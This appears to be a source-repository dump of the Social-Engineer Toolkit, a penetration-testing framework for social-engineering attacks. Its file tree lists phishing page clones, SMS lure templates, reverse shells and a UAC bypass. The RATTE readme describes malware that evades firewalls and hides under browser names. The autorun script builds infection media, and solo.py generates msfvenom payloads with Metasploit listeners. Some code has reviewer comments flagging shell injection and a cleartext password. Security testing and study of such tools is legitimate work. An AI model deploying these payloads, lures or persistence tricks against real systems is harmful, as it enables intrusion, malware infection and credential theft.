├── README.md ├── modules ├── ratte_module.py ├── ratte_only_module.py ├── readme.txt ├── test_module.example └── test_module.readme ├── readme ├── CHANGES ├── CREDITS ├── LICENSE ├── RATTE_README.txt └── User_Manual.pdf ├── seautomate ├── seproxy ├── setoolkit ├── setup.py ├── seupdate └── src ├── __init__.py ├── autorun ├── __init__.py └── autolaunch.py ├── core ├── __init__.py ├── arp_cache │ ├── __init__.py │ └── arp.py ├── config.baseline ├── dictionaries.py ├── fasttrack.py ├── menu │ ├── __init__.py │ └── text.py ├── module_handler.py ├── msf_attacks │ ├── __init__.py │ ├── create_payload.py │ ├── database │ │ └── msf.database │ ├── form.pdf │ └── msf_list.py ├── patched │ ├── __init__.py │ └── socket.py ├── payloadgen │ ├── __init__.py │ ├── create_payloads.py │ └── solo.py ├── payloadprep.py ├── reports │ ├── files │ │ ├── logo.png │ │ ├── main.png │ │ ├── rss.png │ │ ├── style.css │ │ └── tweet.png │ └── index.html ├── scapy.py ├── set.py ├── setcore.py ├── ssl │ ├── PoC_SSL.py │ ├── __init__.py │ └── setssl.py ├── tds.py ├── update_config.py └── webserver.py ├── dev-notes ├── TODO └── html_color.txt ├── fasttrack ├── __init__.py ├── autopwn.py ├── delldrac.py ├── exploits │ ├── __init__.py │ ├── f5.py │ ├── firefox_3_6_16.py │ ├── ms08067.py │ ├── mysql_bypass.py │ ├── rdpdos.py │ └── solarwinds.py ├── mssql.py ├── psexec.py ├── rid_enum.py ├── sccm │ ├── __init__.py │ └── sccm_main.py └── wordlist.txt ├── html ├── Signed_Update.jar.orig ├── __init__.py ├── fasttrack_http_server.py ├── spawn.py ├── templates │ ├── __init__.py │ ├── facebook │ │ └── index.template │ ├── google │ │ └── index.template │ ├── java │ │ └── index.template │ ├── template.py │ ├── twitter │ │ └── index.template │ └── yahoo │ │ └── index.template ├── unsigned │ ├── __init__.py │ ├── self_sign.py │ ├── unsigned.jar │ └── verified_sign.py └── web_start.py ├── payloads ├── __init__.py ├── exe │ ├── shellcodeexec.binary │ └── shellcodeexec.c ├── hex2binary.payload ├── powershell │ ├── 
__init__.py │ ├── powershell_shellcode.code │ └── prep.py ├── ratte │ ├── cygwin1.dll │ ├── ratte.binary │ ├── ratteserver │ └── ratteserver.binary └── set_payloads │ ├── __init__.py │ ├── downloader.c │ ├── downloader.posix │ ├── downloader.windows │ ├── http_shell.binary │ ├── http_shell.py │ ├── listener.py │ ├── multi_pyinjector.binary │ ├── multi_pyinjector.py │ ├── persistence.binary │ ├── persistence.py │ ├── pyinjector.binary │ ├── pyinjector_args.py │ ├── readme.txt │ ├── set_http_server.py │ ├── shell.binary │ ├── shell.linux │ ├── shell.osx │ ├── shell.py │ ├── shell.windows │ └── uac_bypass │ ├── source │ ├── CMMN.cpp │ ├── CMMN.h │ ├── Redirector.cpp │ ├── Redirector.h │ ├── TIOR │ │ ├── TIOR.cpp │ │ ├── TIOR.vcxproj │ │ ├── TIOR.vcxproj.filters │ │ ├── TIOR.vcxproj.user │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ ├── Win7Elevate.sln │ ├── Win7Elevate │ │ ├── Resource.h │ │ ├── Win7Elevate.cpp │ │ ├── Win7Elevate.rc │ │ ├── Win7Elevate.vcxproj │ │ ├── Win7Elevate.vcxproj.filters │ │ ├── Win7Elevate.vcxproj.user │ │ ├── Win7Elevate_Inject.cpp │ │ ├── Win7Elevate_Inject.h │ │ ├── Win7Elevate_Utils.cpp │ │ ├── Win7Elevate_Utils.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ ├── Win7ElevateDll │ │ ├── Win7ElevateDll.cpp │ │ ├── Win7ElevateDll.vcxproj │ │ ├── Win7ElevateDll.vcxproj.filters │ │ ├── Win7ElevateDll.vcxproj.user │ │ ├── dllmain.cpp │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ ├── stdafx.h │ └── targetver.h │ ├── x64.binary │ └── x86.binary ├── phishing ├── __init__.py └── smtp │ ├── __init__.py │ └── client │ ├── __init__.py │ ├── custom_template.py │ ├── smtp_client.py │ └── smtp_web.py ├── powershell ├── __init__.py ├── bind.powershell ├── powerdump.encoded ├── powerdump.powershell ├── powershell.py ├── reverse.powershell ├── shellcode_injection.powershell └── shellcode_injection_expanded.powershell ├── qrcode ├── __init__.py ├── qrcode.py └── qrgenerator.py ├── teensy ├── __init__.py ├── beef.pde ├── 
binary2teensy.py ├── gnome_wget.pde ├── java_applet.pde ├── osx_sd2teensy.pde ├── peensy.pde ├── powershell_down.pde ├── powershell_reverse.pde ├── powershell_shellcode.py ├── sd2teensy.py ├── teensy.py ├── wscript.pde └── x10 │ ├── libraries.zip │ ├── x10_blackout.pde │ └── x10_sniffer.pde ├── templates ├── 31328256862518006364.template ├── 4842870413984355770.template ├── 84863010888203269076.template ├── baby.template ├── ebook.template ├── newupdate.template ├── receipt.template ├── report.template ├── sms │ ├── 12161896267335046246.template │ ├── 16596172621284277248.template │ ├── 18563883160952176830.template │ ├── 27973430829013746123.template │ ├── 34070789312210934380.template │ ├── 43234513006619301607.template │ ├── 45723463533772650533.template │ ├── 48842587427349852379.template │ ├── 51366883259558865424.template │ ├── 5366255995038334754.template │ ├── 61235614880419094815.template │ ├── 65225885161440001690.template │ ├── 71056159094763737298.template │ ├── 81470651031833477694.template │ ├── 89232956998478665492.template │ ├── 93752647864031571599.template │ ├── 98099561929676707961.template │ ├── fake_boss.template │ ├── fake_police.template │ └── fool_vodafone.template ├── status.template └── strange.template ├── webattack ├── __init__.py ├── browser_exploits │ ├── __init__.py │ └── gen_payload.py ├── dll_hijacking │ ├── __init__.py │ ├── hijacking.c │ ├── hijacking.c.wscript │ ├── hijacking.dll │ ├── hijacking.dll.wscript │ ├── hijacking.py │ └── repository ├── fsattack │ ├── FACEBOOK │ │ ├── css │ │ │ ├── facebox.css │ │ │ └── style.css │ │ ├── img │ │ │ ├── browser-linux-chrome-bg.png │ │ │ ├── browser-linux-chrome-left.png │ │ │ ├── browser-linux-chrome-right.png │ │ │ ├── browser-linux-firefox-bg.png │ │ │ ├── browser-linux-firefox-left.png │ │ │ ├── browser-linux-firefox-right.png │ │ │ ├── browser-osx-chrome-bg.png │ │ │ ├── browser-osx-chrome-left.png │ │ │ ├── browser-osx-chrome-right.png │ │ │ ├── browser-osx-firefox-bg.png │ │ │ ├── 
browser-osx-firefox-center.png │ │ │ ├── browser-osx-firefox-left.png │ │ │ ├── browser-osx-firefox-right.png │ │ │ ├── browser-osx-safari-bg.png │ │ │ ├── browser-osx-safari-center.png │ │ │ ├── browser-osx-safari-left.png │ │ │ ├── browser-osx-safari-right.png │ │ │ ├── browser-windows-chrome-bg.png │ │ │ ├── browser-windows-chrome-left.png │ │ │ ├── browser-windows-chrome-right.png │ │ │ ├── browser-windows-firefox-bg.png │ │ │ ├── browser-windows-firefox-left.png │ │ │ ├── browser-windows-firefox-right.png │ │ │ ├── facebox │ │ │ │ ├── closelabel.png │ │ │ │ └── loading.gif │ │ │ ├── fb.png │ │ │ ├── flogin.png │ │ │ ├── menu-osx-bg.png │ │ │ ├── menu-osx-chrome-left.png │ │ │ ├── menu-osx-firefox-left.png │ │ │ ├── menu-osx-right.png │ │ │ └── menu-osx-safari-left.png │ │ └── js │ │ │ ├── libs │ │ │ ├── browser-detect.js │ │ │ ├── facebox.js │ │ │ ├── fullscreen-api-shim.js │ │ │ ├── jquery-1.7.2.js │ │ │ └── jquery-ui-1.8.18.custom.min.js │ │ │ ├── plugins.js │ │ │ └── script.js │ ├── GMAIL │ │ ├── css │ │ │ ├── facebox.css │ │ │ └── style.css │ │ ├── img │ │ │ ├── browser-linux-chrome-bg.png │ │ │ ├── browser-linux-chrome-left.png │ │ │ ├── browser-linux-chrome-right.png │ │ │ ├── browser-linux-firefox-bg.png │ │ │ ├── browser-linux-firefox-left.png │ │ │ ├── browser-linux-firefox-right.png │ │ │ ├── browser-osx-chrome-bg.png │ │ │ ├── browser-osx-chrome-left.png │ │ │ ├── browser-osx-chrome-right.png │ │ │ ├── browser-osx-firefox-bg.png │ │ │ ├── browser-osx-firefox-center.png │ │ │ ├── browser-osx-firefox-left.png │ │ │ ├── browser-osx-firefox-right.png │ │ │ ├── browser-osx-safari-bg.png │ │ │ ├── browser-osx-safari-center.png │ │ │ ├── browser-osx-safari-left.png │ │ │ ├── browser-osx-safari-right.png │ │ │ ├── browser-windows-chrome-bg.png │ │ │ ├── browser-windows-chrome-left.png │ │ │ ├── browser-windows-chrome-right.png │ │ │ ├── browser-windows-firefox-bg.png │ │ │ ├── browser-windows-firefox-left.png │ │ │ ├── browser-windows-firefox-right.png │ │ 
│ ├── facebox │ │ │ │ ├── closelabel.png │ │ │ │ └── loading.gif │ │ │ ├── glogin.png │ │ │ ├── gmail.png │ │ │ ├── lgmail.png │ │ │ ├── menu-osx-bg.png │ │ │ ├── menu-osx-chrome-left.png │ │ │ ├── menu-osx-firefox-left.png │ │ │ ├── menu-osx-right.png │ │ │ └── menu-osx-safari-left.png │ │ └── js │ │ │ ├── libs │ │ │ ├── browser-detect.js │ │ │ ├── facebox.js │ │ │ ├── fullscreen-api-shim.js │ │ │ ├── jquery-1.7.2.js │ │ │ └── jquery-ui-1.8.18.custom.min.js │ │ │ ├── plugins.js │ │ │ └── script.js │ ├── __init__.py │ ├── fsattacks.py │ ├── full.py │ └── readme ├── harvester │ ├── __init__.py │ ├── harvester.py │ ├── report_generator.py │ └── scraper.py ├── hta │ ├── __init__.py │ └── main.py ├── java_applet │ ├── Java.java │ ├── manifest.mf │ ├── sign.sh │ ├── sign_jar.py │ └── unsigned.py ├── mlitm │ ├── __init__.py │ └── thebiz.py ├── multi_attack │ ├── __init__.py │ └── multiattack.py ├── profiler │ ├── __init__.py │ └── webprofiler.py ├── tabnabbing │ ├── __init__.py │ ├── source.js │ └── tabnabbing.py └── web_clone │ ├── __init__.py │ ├── applet.database │ ├── applet.database.old │ ├── applet.txt │ ├── cloner.py │ ├── repeater.database │ └── unc.database └── wireless ├── __init__.py ├── airbase-ng ├── airmon-ng ├── stop_wifiattack.py └── wifiattack.py /README.md: -------------------------------------------------------------------------------- 1 | #The Social-Engineer Toolkit (SET) 2 | Copyright 2015 The Social-Engineer Toolkit (SET) 3 | 4 | Written by: David Kennedy (ReL1K) 5 | 6 | Company: [TrustedSec](https://www.trustedsec.com) 7 | 8 | DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. 9 | 10 | Please read the LICENSE under readme/LICENSE for the licensing of SET. 11 | 12 | #Features 13 | 14 | The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. 
SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio. 15 | 16 | ### Bugs and enhancements 17 | 18 | For bug reports or enhancements, please open an issue here: https://github.com/trustedsec/social-engineer-toolkit/issues 19 | 20 | ### Supported platforms 21 | 22 | * Linux 23 | * Windows (experimental) 24 | * Mac OS X (partial) 25 | -------------------------------------------------------------------------------- /modules/readme.txt: -------------------------------------------------------------------------------- 1 | This is a new section to add your own modules, you can use function calls like: 2 | 3 | Read the readme/User_Manual.pdf on how to create your own SET modules. 4 | 5 | -------------------------------------------------------------------------------- /modules/test_module.example: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # These are required fields 4 | from src.core.setcore import * 5 | import sys 6 | 7 | MAIN = " This is a test module" 8 | AUTHOR = " Dave - TrustedSec" 9 | 10 | # def main(): header is required 11 | def main(): 12 | java_applet_attack("https://gmail.com","443","reports/") 13 | pause=raw_input(" This module has finished completing. Press to continue") 14 | -------------------------------------------------------------------------------- /modules/test_module.readme: -------------------------------------------------------------------------------- 1 | # 2 | # These are required fields 3 | # 4 | from src.core.setcore import * 5 | import sys 6 | 7 | MAIN="This is a test module" 8 | AUTHOR="Dave - TrustedSec" 9 | 10 | # def main(): header is required 11 | def main(): 12 | java_applet_attack("https://gmail.com","443","reports/") 13 | pause=raw_input("This module has finished completing. 
Press to continue") 14 | -------------------------------------------------------------------------------- /readme/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Copyright 2015, The Social-Engineer Toolkit (SET) by TrustedSec, LLC 3 | All rights reserved. 4 | 5 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 8 | * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 9 | * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 10 | 11 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 12 | 13 | The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well. 14 | 15 | Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application. 
16 | 17 | Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen). 18 | -------------------------------------------------------------------------------- /readme/RATTE_README.txt: -------------------------------------------------------------------------------- 1 | RATTE (Remote Administration Tool Tommy Edition) is a payload and third party module added/created to SET by 2 | Thomas Werth. 3 | 4 | A couple of things to note about RATTE is that its main purpose and design is to completely evade egress and firewall based restrictions by leveraging purely HTTP communications for the commands back and forth. 5 | RATTE has been extended to be very customizable. 6 | For now you can set: 7 | - Connect Back IP 8 | - Connect Back Port 9 | - Whether RATTE is persistent or not (example: For network Firewall testing, there is no need for being persistent. In a penetration test things may look different) 10 | - a custom filename which RATTE uses for running so local firewalls and users may be fooled using names like iexplore.exe or firefox.exe and so on ... 11 | 12 | If RATTE is persistent, it tries on NTFS Systems to inject itself into Default Browser file binary and replaces 13 | the executables with a portion of its own code in it as well. If this fails RATTE will save itself as autorun app using custom filename specified. If this one is missing it will go as iexplore.exe. 14 | 15 | RATTE relies on communications to microsoft.com to identify the path out of the network. 
16 | -------------------------------------------------------------------------------- /readme/User_Manual.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/readme/User_Manual.pdf -------------------------------------------------------------------------------- /seproxy: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # 4 | # Simple proxy for SET, note will show up in history 5 | # 6 | 7 | import pexpect 8 | import sys 9 | import getpass 10 | 11 | from src.core.setcore import * 12 | 13 | # grab the operating system 14 | operating_system = check_os() 15 | 16 | # the proxy setup below only runs when check_os() reports "posix"; every other value falls through to the else branch at the bottom 17 | if operating_system == "posix": 18 | 19 | definepath = os.getcwd() 20 | 21 | print "\n[*] Welcome to the SET-Proxy Configuration Utility" 22 | print "\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n" 23 | 24 | try: 25 | 26 | proxy = raw_input("Enter the proxy server: ") 27 | username = raw_input("Enter the username for the proxy (hit enter for none): ") 28 | password = getpass.getpass("Enter the password for the proxy (hit enter for none): ") 29 | 30 | except KeyboardInterrupt: 31 | print "\n[!] Exiting the Social-Engineer Toolkit." 
32 | sys.exit() 33 | 34 | if username != "": 35 | proxy_string = "export http_proxy='http://%s:%s@%s'" % (username,password,proxy) 36 | 37 | if username == "": 38 | proxy_string = "export http_proxy='http://%s'" % (proxy) # NOTE(review): the example shown at the prompt already starts with http://, so the scheme is doubled when the value is entered as shown 39 | 40 | filewrite = file(setdir + "/proxy.config", "w") # NOTE(review): the proxy password is stored in this file in clear text and the file is created with default permissions 41 | filewrite.write(proxy_string) 42 | filewrite.close() 43 | 44 | from src.core.set import * 45 | 46 | def kill_proc(port,flag): # find a PID in the netstat output by port text and program name (flag), then kill -9 it 47 | proc=subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE) 48 | stdout_value=proc.communicate()[0] 49 | a=re.search("\d+/%s" % (flag), stdout_value) 50 | if a: 51 | b=a.group() 52 | b=b.replace("/%s" % (flag),"") 53 | subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" % (b), shell=True).wait() 54 | 55 | # cleans up stale processes from SET 56 | try: 57 | # kill anything python running on 80; NOTE(review): grep matches the text 80 anywhere in a netstat line (8080, addresses), so an unrelated python process can be picked 58 | kill_proc("80","python") 59 | # kill anything on 443 ruby which is generally a rogue listener 60 | kill_proc("443", "ruby") 61 | 62 | # log any error and carry on 63 | except Exception, error: 64 | log(error) 65 | pass 66 | else: 67 | print "[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system." 68 | -------------------------------------------------------------------------------- /seupdate: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # simple svn update for set pulling from core modules 4 | # 5 | import os 6 | import sys 7 | 8 | # check where we are and load default directory 9 | if os.path.isdir("/usr/share/setoolkit"): 10 | if not os.path.isfile("se-toolkit"): 11 | os.chdir("/usr/share/setoolkit") 12 | sys.path.append("/usr/share/setoolkit") 13 | 14 | # if we can't see our config then something didn't go good.. NOTE(review): print_error is not defined yet at this point, the setcore star import only happens further down 15 | if not os.path.isfile("/etc/setoolkit/set.config"): 16 | print_error("Cannot locate SET executable. 
Try running from the local directory.") 17 | print_error("If this does not work, please run the setup.py install file.") 18 | sys.exit() 19 | 20 | from src.core.setcore import * 21 | 22 | try: 23 | # pull update set from the core libraries 24 | update_set() 25 | 26 | # except keyboard interrupts 27 | except KeyboardInterrupt: 28 | print "\n[!] Control-C detected. Exiting updating SET." 29 | 30 | # handle all other errors 31 | except Exception, e: print "\n[!] Something went wrong.. Printing the error: " + e 32 | -------------------------------------------------------------------------------- /src/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/__init__.py -------------------------------------------------------------------------------- /src/autorun/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/autorun/__init__.py -------------------------------------------------------------------------------- /src/autorun/autolaunch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # simple autorun creation for set 3 | 4 | import subprocess 5 | import os 6 | import re 7 | import sys 8 | from src.core.setcore import * 9 | from time import sleep 10 | 11 | # define metasploit path 12 | definepath = os.getcwd() 13 | msf_path = meta_path() 14 | me = mod_name() 15 | 16 | trigger = 0 17 | if check_options("INFECTION_MEDIA=") == "ON": 18 | #if os.path.isfile(setdir + "/standardpayload.file"): 19 | trigger = 1 20 | subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> 
/dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" % (setdir,setdir,setdir,setdir), shell=True).wait() 21 | 22 | if os.path.isfile(setdir + "/fileformat.file"): 23 | trigger = 2 24 | subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" % (setdir,setdir), shell=True).wait() 25 | 26 | if os.path.isfile(setdir + "/dll/openthis.wab"): 27 | subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait() 28 | trigger = 3 29 | 30 | if not os.path.isdir(setdir + "/autorun"): os.makedirs (setdir + "/autorun/") 31 | filewrite = file(setdir + "/autorun/autorun.inf", "w") 32 | 33 | # if using standard payloads 34 | if trigger == 1: 35 | payload = "program.exe" #"" + alpha_data + "\"" 36 | 37 | # if using pdf payload 38 | if trigger == 2: 39 | payload = "template.pdf" 40 | 41 | if trigger == 3: 42 | payload = "openthis.wab" 43 | 44 | filewrite.write("""[autorun] 45 | open=%s 46 | icon=autorun.ico""" % (payload)) 47 | filewrite.close() 48 | print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'") 49 | print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.") 50 | print_info("Copy the contents of the folder to a CD/DVD/USB to autorun") 51 | 52 | # if we want to launch payload and automatically create listener 53 | if trigger == 1 or trigger == 2 or trigger == 3: 54 | choice1 = yesno_prompt("0", "Create a listener right now [yes|no]") 55 | if choice1.lower() == "yes" or choice1.lower() == "y": 56 | # if we used something to create other than solo.py then write out the listener 57 | if not os.path.isfile(setdir + "/meta_config"): 58 | filewrite = file(setdir + "/meta_config", "w") 59 | fileopen = file(setdir + "/payload.options", "r") 60 | for line 
in fileopen: 61 | line = line.split(" ") 62 | filewrite.write("use multi/handler\n") 63 | filewrite.write("set payload " + line[0] + "\n") 64 | filewrite.write("set lhost " + line[1] + "\n") 65 | filewrite.write("set lport " + line[2] + "\n") 66 | filewrite.write("set ExitOnSession false\n") 67 | filewrite.write("exploit -j\r\n\r\n") 68 | filewrite.close() 69 | 70 | # create the listener 71 | print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..") 72 | subprocess.Popen("%smsfconsole -r %s/meta_config" % (msf_path, setdir), shell=True).wait() 73 | else: 74 | print_warning("cancelling...") 75 | sleep (2) 76 | -------------------------------------------------------------------------------- /src/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/__init__.py -------------------------------------------------------------------------------- /src/core/arp_cache/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/arp_cache/__init__.py -------------------------------------------------------------------------------- /src/core/menu/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/menu/__init__.py -------------------------------------------------------------------------------- /src/core/module_handler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 
python 2 | 3 | ## module_handler.py 4 | 5 | import glob 6 | import re 7 | import sys 8 | from src.core.setcore import * 9 | 10 | # flag that is set to "true" when the user picks 99 to return to the previous menu 11 | menu_return = "false" 12 | 13 | # running menu number assigned to each module file 14 | counter = 0 15 | 16 | # get the menu going 17 | print "\n" 18 | print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.") 19 | print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n") 20 | 21 | for name in glob.glob("modules/*.py"): 22 | 23 | counter = counter + 1 24 | fileopen = file(name, "r") 25 | 26 | for line in fileopen: 27 | line = line.rstrip() 28 | match = re.search("MAIN=", line) 29 | if match: 30 | line = line.replace('MAIN="', "") 31 | line = line.replace('"', "") 32 | line = " " + str(counter) + ". " + line 33 | print line 34 | 35 | print "\n 99. Return to the previous menu\n" 36 | choice = raw_input(setprompt(["9"], "")) 37 | 38 | if choice == 'exit': 39 | exit_set() 40 | 41 | if choice == '99': 42 | menu_return = "true" 43 | 44 | # warn and ask again if the choice is not an integer; NOTE(review): the second answer is not converted or re-checked, so int(choice) further down can still raise ValueError 45 | try: 46 | choice = int(choice) 47 | except: 48 | print_warning("An integer was not used try again") 49 | choice = raw_input(setprompt(["9"], "")) 50 | 51 | # start a new counter to match choice 52 | counter = 0 53 | 54 | if menu_return == "false": 55 | # walk the modules directory again, matching every file that ends with .py 56 | for name in glob.glob("modules/*.py"): 57 | 58 | counter = counter+1 59 | 60 | if counter == int(choice): 61 | # strip the modules/ directory prefix 62 | name = name.replace("modules/", "") 63 | # get rid of .py extension 64 | name = name.replace(".py", "") 65 | # changes our system path to modules so we can import the files 66 | sys.path.append("modules/") 67 | # this will import the third party module; NOTE(review): exec() runs the module's top-level code with the privileges SET runs under, and the bare except below hides import errors - keep only trusted files in modules/ 68 | 69 | try: 70 | exec("import " + name) 71 | except: 72 | pass 73 | 74 | # this will call the main() function inside the python file 75 | # if it doesn't exist it 
will still continue just throw a warning 76 | try: 77 | exec("%s.main()" % (name)) 78 | # handle the exception if main isn't there 79 | except Exception, e: 80 | raw_input(" [!] There was an issue with a module: %s." % (e)) 81 | return_continue() 82 | -------------------------------------------------------------------------------- /src/core/msf_attacks/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/msf_attacks/__init__.py -------------------------------------------------------------------------------- /src/core/msf_attacks/database/msf.database: -------------------------------------------------------------------------------- 1 | exploit/windows/fileformat/adobe_collectemailinfo Adobe Collab.collectEmailInfo() Buffer Overflow 2 | exploit/windows/fileformat/adobe_geticon Adobe Collab.getIcon() Buffer Overflow 3 | exploit/windows/fileformat/adobe_jbig2decode Adobe JBIG2Decode Memory Corruption Exploit 4 | exploit/windows/fileformat/adobe_pdf_embedded_exe Adobe PDF Embedded EXE Social Engineering 5 | exploit/windows/fileformat/adobe_utilprintf Adobe util.printf() Buffer Overflow 6 | exploit/windows/fileformat/adobe_u3d_meshdecl Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 7 | exploit/windows/fileformat/adobe_flatedecode_predictor02 Adobe FlateDecode Stream Predictor 02 Integer Overflow 8 | exploit/windows/fileformat/adobe_media_newplayer Adobe Doc.media.newPlayer Use After Free Vulnerability 9 | 10 | -------------------------------------------------------------------------------- /src/core/msf_attacks/form.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/msf_attacks/form.pdf -------------------------------------------------------------------------------- /src/core/msf_attacks/msf_list.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from src.core.setcore import debug_msg, mod_name 3 | import subprocess 4 | import re 5 | import sys 6 | 7 | me = mod_name() 8 | 9 | sys.path.append("src/core") 10 | debug_msg(me,"re-importing 'src.core.setcore'",1) 11 | try: reload(setcore) 12 | except: import setcore 13 | print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]" 14 | generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait() 15 | print "[---] Database is now up-to-date [---]" 16 | -------------------------------------------------------------------------------- /src/core/patched/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/patched/__init__.py -------------------------------------------------------------------------------- /src/core/payloadgen/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/payloadgen/__init__.py -------------------------------------------------------------------------------- /src/core/payloadgen/solo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | from 
src.core.setcore import * 4 | from src.core.menu.text import * 5 | from src.core.dictionaries import * 6 | 7 | # remember the current working directory and make it importable 8 | definepath=os.getcwd() 9 | sys.path.append(definepath) 10 | # grab the metasploit path; NOTE(review): this rebinds the name meta_path from the imported function to its return value 11 | meta_path = meta_path() 12 | 13 | # here we handle our main payload generation: run msfvenom and write the matching handler rc file 14 | def payload_generate(payload, lhost, port): 15 | # generate metasploit; NOTE(review): lhost and port are typed in at the prompts below and go into a shell=True command line unquoted - check that they are an address and a port number first 16 | subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" % (payload,lhost,port,setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() 17 | # write out the rc file 18 | filewrite = file(setdir + "/meta_config", "w") 19 | filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload,lhost,port)) 20 | filewrite.close() 21 | print_status("Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe") 22 | 23 | show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2) 